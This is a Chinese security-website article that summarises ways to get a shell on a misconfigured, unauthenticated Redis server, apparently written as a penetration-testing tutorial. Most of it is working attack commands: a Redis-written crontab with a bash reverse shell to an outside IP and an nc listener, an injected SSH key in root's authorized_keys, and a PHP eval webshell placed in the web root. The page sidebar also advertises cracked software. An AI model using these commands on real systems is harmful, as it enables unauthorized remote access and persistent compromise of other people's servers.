ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全文章 → Redis漏洞Getshell渗透测试总结

Redis漏洞Getshell渗透测试总结

时间:2018-05-24 07:00:48人气:作者:本站作者我要评论

Redis漏洞Getshell渗透测试总结

前言

Redis常见getshell方式有如下几种:

1、通过向Web目录中写webshell的方式进行getshell

2、通过写SSH key的方式进行getshell

3、通过写corntab的方式进行getshell

当然,方法也不局限于此,而且以上方法也包括对一些当前用户权限、目录权限、Web目录是否已知等要求。同时除了getshell,该漏洞还会导致一些其他危害,比如如何利用还是要结合具体的场景进行分析。

基础环境

Ubuntu 16.04.4 LTS

Redis server v=4.0.9

redis搭建

环境搭建主要分为两块介绍,一个是redis服务的搭建,另一个是redis客户端相关的环境搭建及常用命令介绍。

redis安装

第1步:redis下载

  1. wget http://download.redis.io/releases/redis-4.0.9.tar.gz

第2步:redis解压、编译

  1. tar -zxvf redis-4.0.9.tar.gz
  2. cd redis-4.0.9
  3. make
  4. make test
  5. make install

redis服务的默认安装路径为/usr/local/bin

第3步:启动redis服务

由于在新版本的redis服务中,默认监听地址已经由原来的0.0.0.0更新为127.0.0.1,为了还原漏洞现场,我们修改配置文件,将监听的IP地址改为0.0.0.0。

  1. vim redis.conf
  2. redis-server /root/redis-4.0.9/redis.conf

接下来就可以进行相应的漏洞测试了。

Redis在渗透中的getshell方法

Redis在渗透中常见的getshell方法已再前言部分总结,这里对相应的技术细节逐一进行介绍。

1、通过写corntab的方式进行getshell

第1步:通过redis-cli进入交互式shell

  1. redis-cli.exe -h www.cesafe.com -p 6379

第2步:设置文件夹路径

  1. config set dir /var/spool/cron/crontabs

第3步:修改备份文件名

  1. config set dbfilename root

第4步:设置计划任务

  1. set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/198.xx.xx.xxx/9999 0>&1\n\n\n"

第5步:保存

第6步:监听公网机器指定端口,接收反弹shell

  1. nc -v -l -p 9999

2、通过写SSH key的方式进行getshell

第1步:本地生成公钥文件

  1. ssh-keygen–trsa

第2步:将生成的公钥写入到文件中

  1. (echo -e "\n\n\n\n"; cat id_rsa.pub; echo -e "\n\n\n\n") > cesafe.txt

第3步:设置路径、文件、写入公钥

  1. config set dir /root/.ssh/
  2. config set dbfilename "authorized_keys"
  3. config set 233 "xxxx"
  4. save

第4步:连接

  1. ssh -i id_rsa root@www.cesafe.com

3、通过向Web目录中写webshell的方式进行getshell

限制条件:Web目录已知,当前用户在该目录下具有写权限。

  1. config set dir /var/www/www.cesafe.com/html/
  2. config set dbfilename webshell.php
  3. set 1 "<?php @eval($_POST['www.cesafe.com']);?>"
  4. save

直接菜刀连接,搞定!

结尾语

看似很简单,实际操作起来,出现了很多非预期设想到的问题,比如说乱码、crontab格式、执行失败,shell反弹不回来等等问题。

相关文章

猜你喜欢

  • Ougishi绿色版下载 V4.00 中文版

    2020-06-19 / 561k

  • 谷歌地图下载助手睿智版破解下载 V9.5绿色版

    2020-06-19 / 32.7M

  • OfficeFIX中文破解版V6.110 注册版

    2020-06-19 / 26.8M

  • Plotagraph破解版V1.2.0 免费版 32/64位

    2020-06-19 / 31.5M

  • IP查详细地址工具下载 V1.1 官方免费版

    2020-06-19 / 408K

  • 内存扫把中文版下载V1.97绿色版

    2020-06-19 / 1.3M

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网